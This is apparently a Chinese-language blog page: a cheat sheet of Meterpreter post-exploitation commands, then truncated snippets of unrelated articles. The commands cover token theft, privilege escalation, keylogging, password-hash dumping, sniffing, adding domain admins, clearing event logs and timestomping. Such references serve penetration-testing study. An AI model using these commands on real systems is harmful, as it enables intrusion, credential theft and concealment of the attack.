metasploit中meterpreter命令

  meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

常见的meterpreter命令

  1.  run scriptname       运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
  2. sysinfo                    列出受控主机的系统信息。
  3.   ls                             列出目标主机的文件和文件夹信息。
  4. use priv                    加载特权提升扩展模块,来扩展Meterpreter库。
  5. ps                            显示所有运行进程以及关联的用户账号。
  6. migrate PID               迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
  7. use incognito             加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
  8. list_tokens -u            列出目标主机用户的可用令牌。
  9. list_tokens -g            列出目标主机用户组的可用令牌。
  10. impersonate_token DOMAIN_NAME\\USERNAME             假冒目标主机上的可用令牌。
  11. steal_token PID          盗窃给定进程的可用令牌并进行令牌假冒。
  12. drop_token                停止假冒当前令牌。
  13. getsystem                  通过各种攻击向量来提升系统用户权限。
  14. shell                          以所有可用令牌来运行一个交互的shell。
  15. execute -f cmd.exe -i  执行cmd.exe命令并进行交互。
  16. execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
  17. execute -f cmd.exe -i -H -t  以所有可用的令牌来执行cmd命令并隐藏该进程。
  18. rev2self                      回到控制目标主机的初始化用户账号下。
  19. reg command              在目标主机注册表中进行交互,创建,删除,查询等操作。
  20. setdesktop number      切换到另一个用户界面(该功能基于哪些用户已登录)。
  21. screenshot                  对目标主机的屏幕进行截图。
  22. upload file                   向目标主机上传文件
  23. download file               从目标主机下载文件。
  24. keyscan_start             针对远程目标主机开启键盘记录功能。
  25. keyscan_dump            存储目标主机上捕获的键盘记录。
  26. keyscan_stop              停止针对目标主机的键盘记录功能。
  27. getprivs                      尽可能多的获取目标主机上的特权。
  28. uictl enable keyboard/mouse     接管目标主机的键盘和鼠标。
  29. background                 将你当前的Meterpreter shell转为后台执行。
  30. hashdump                   导出目标主机中的口令哈希值。
  31. use sniffer                   加载嗅探模块。
  32. sniffer_interfaces          列出目标主机所有开放的网络接口。
  33. sniffer_dump interfaceID pcapname        在目标主机上启动嗅探。
  34. sniffer_stats interfaceID  获取正在实施嗅探网络接口的统计数据。
  35. sniffer_start interfaceID packet-buffer  在目标主机上针对特定范围的数据包缓冲区启动嗅探。
  36. sniffer_stop interfaceID 停止嗅探。
  37. add_user username password -h ip   在远程目标主机上添加一个用户。
  38. add_group_user "Domain Admins" username -h ip     将用户添加到目标主机的域管理员组中。
  39. clearev                        清除目标主机上的日志记录。
  40. timestomp                   修改文件属性,例如修改文件的创建时间(反取证调查)。
  41. reboot                         重启目标主机。
时间: 2024-11-07 20:34:06

metasploit中meterpreter命令的相关文章

Metasploit中的一个扫描神器 -- WMAP

Metasploit是一个极其强大的渗透测试框架,包含了巨量模块.但是,模块数量众多,使得在使用的时候也很不方便.于是就有了WMAP.这个工具可以一次运用多个模块,并将结果保存在数据库中,十分方便. 由于在学习过程中,在百度上搜索时没能找到WMAP的较为专门描述的文章,就打算翻译一个英文教程,让大家的学习更方便. 以下是文章正文: 什么是WMAP? WMAP 是一款最初由 SQLMap 创建而来的多功能网络应用漏洞扫描器.这个工具整合在Metasploit中,并且可以从Metasploit Fr

Metasploit中数据库的密码查看以及使用pgadmin远程连接数据库

我们都知道,在msf下进行渗透测试工作的时候,可以将结果数据保存到数据库中,方便各个小组成员在渗透测试过程中的数据同步. 例如,Metasploit提供了db_nmap命令,它能够将Nmap扫描结果直接存入数据库中,此外还提供了db_import命令,支持多达20中扫描器扫描结果的导入. Metasploit支持多种数据库,如:MySQL.SQLite3.PostgreSQL,其中PostgreSQL被作为默认数据库使用. 要启用msfconsole的时候,首先需要启用postgresql和me

Kail Linux渗透测试教程之在Metasploit中扫描

Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息.本节将介绍使用Metasploit中的辅助模块实现扫描. [实例4-4]在Metasploit中,扫描目标主机.具体操作步骤如下所示: (1)启动MSF终端.执行命令如下所示: root@kali :~# msfconsole msf> (2)搜索所有可用的扫描模块.执行命令如下所示:

HDFS中的命令行

HDFS中的命令行 本文介绍了HDFS以命令行执行的时候.几个经常使用的命令行的作用和怎样使用~ 1. fs fs是启动命令行动作,该命令用于提供一系列子命令. 使用形式为hadoop fs –cmd <args> 当中,cmd是子命令,args是详细的命令操作. 比如hadoop fs –help 或者说fs是其余子命令的父亲.其余都是在"-cmd"的模式下的! 2. –cat 输出 hadoop fs –cat URI 将路径指定的文件输出到屏幕 3. –copyFro

SD卡中的命令CMD

SD卡中的命令是SD控制器和SD卡之间的桥梁,它封装了SD卡的实现细节,不影响SD卡中FLASH的读写变更. 命令的长度是48位,它的字段如图: SD校准定义的CMD如下:

WPF 在事件中绑定命令(可以在模版中绑定命令)

其实这也不属于MVVMLight系列中的东东了,没兴趣的朋友可以跳过这篇文章,本文主要介绍如何在WPF中实现将命令绑定到事件中. 上一篇中我们介绍了MVVMLight中的命令的用法,那么仅仅知道命令是如何构建使用的还不够,很多情况下我们都需要在某个事件触发的时候才去触发命令,所以将命令绑定到事件上是非常有效的做法,下面我们来接着实现将命令绑定到事件中. WPF实现命令绑定到事件 使用 System.Windows.Interactivity.dll 中的 Interaction 可以帮助我们实现

[转]Windows中的命令行提示符里的Start命令执行路径包含空格时的问题

转自:http://www.x2009.net/articles/windows-command-line-prompt-start-path-space.html 当使用Windows 中的命令行提示符执行这段指令时(测试Start命令执行带空格的路径的程序或文件问题),第一行Start会成功执行,跳出记事本程序,而第二行,会 Start跳出一个新的命令提示符,标题上写着路径,但是不会执行任何命令,第三行Start命令行提示符会提示C:\Program文件不存在,提示无 法执行. start

[Sqlite3].help中的命令介绍

sqlite的安装1. 首先是下载sqlite,可以该页面下载:http://www.sqlite.org/download.html当前的最新版本为:sqlite-shell-win32-x86-3070701.zip这个是windows下sqlite的命令行管理工具,用它可以管理sqlite数据库文件,同时最好把文档也下载下来,里面包含了详细的sqlite的使用说明:sqlite-doc-3070701.zip 2. sqlite无需任何配置和安装,只要将下载下来的shell文件解压到任何你

linux中find命令详解

http://blog.csdn.net/pipisorry/article/details/39831419 问题: linux中find命令查找时不包含某些目录 find 命令忽略某个或多个子目录的方法 在linux中用find 进行查找的时候,有时候需要忽略某些目录不查找,可以使用 -prune 参数来进行过滤,要忽略的路径参数必须紧跟着搜索的路径之后,否则该参数无法起作用. eg: [email protected]:/tmp1#find ./ -type f    #/tmp1目录下所